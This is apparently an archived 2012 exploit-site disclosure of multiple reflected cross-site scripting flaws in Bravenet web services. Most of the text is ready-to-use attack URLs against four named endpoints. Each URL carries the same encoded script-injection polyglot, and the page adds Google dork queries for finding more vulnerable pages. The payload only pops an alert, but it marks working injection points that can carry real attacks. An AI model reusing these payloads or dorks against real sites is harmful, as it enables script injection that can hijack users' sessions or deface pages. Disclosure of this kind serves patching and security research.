Home / exploitsPDF  

Bravenet Web Services Cross Site Scripting

Posted on 01 March 2012

# Exploit Title: Bravenet Web Services Cross Site Scripting
# Date: 29.02.2012
# Author: Sony
# Software Link: bravenet.com/
# Google Dorks: inurl:calendar/day.php?usernum= or inurl:
http://pub22.bravenet.com or what you want
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/bravenet-web-services-cross-site.html
..................................................................

What is Bravenet? Simple, but interesting services.

http://wiki.bravenet.com/Main_Page

We have a multiple cross site scripting vulnerabilities.

1. signup.php

http://www.bravenet.com/signup/signup.php?serv_name=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

http://3.bp.blogspot.com/-ES-Kj70ptiU/T05hWfEh2xI/AAAAAAAAApg/x9kV-px8MGs/s1600/1.JPG

2. rate.php

http://pub22.bravenet.com/freelink/rate.php?usernum=1852580888&id=892119%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

http://4.bp.blogspot.com/-0TAfk_kYXi4/T05hi6oU9YI/AAAAAAAAAps/pTyj6eZ_PRM/s1600/2rate.JPG

3. forum/static/show.php

http://pub22.bravenet.com/forum/static/show.php?usernum=1868266528&frmid=1811%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&msgid=0

http://1.bp.blogspot.com/-VfznVUkRrUw/T05h1KVkvDI/AAAAAAAAAp4/7edxJaRVaOU/s1600/3f.JPG

4. calendar/day.php

http://pub22.bravenet.com/calendar/day.php?usernum=1875234170%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&y=2012&m=02&d=08

http://3.bp.blogspot.com/-igQxXEEr7PM/T05iAItutcI/AAAAAAAAAqE/eASANv17wpM/s1600/4calendar.JPG

Etc..

 

TOP

Malware :

Exploits :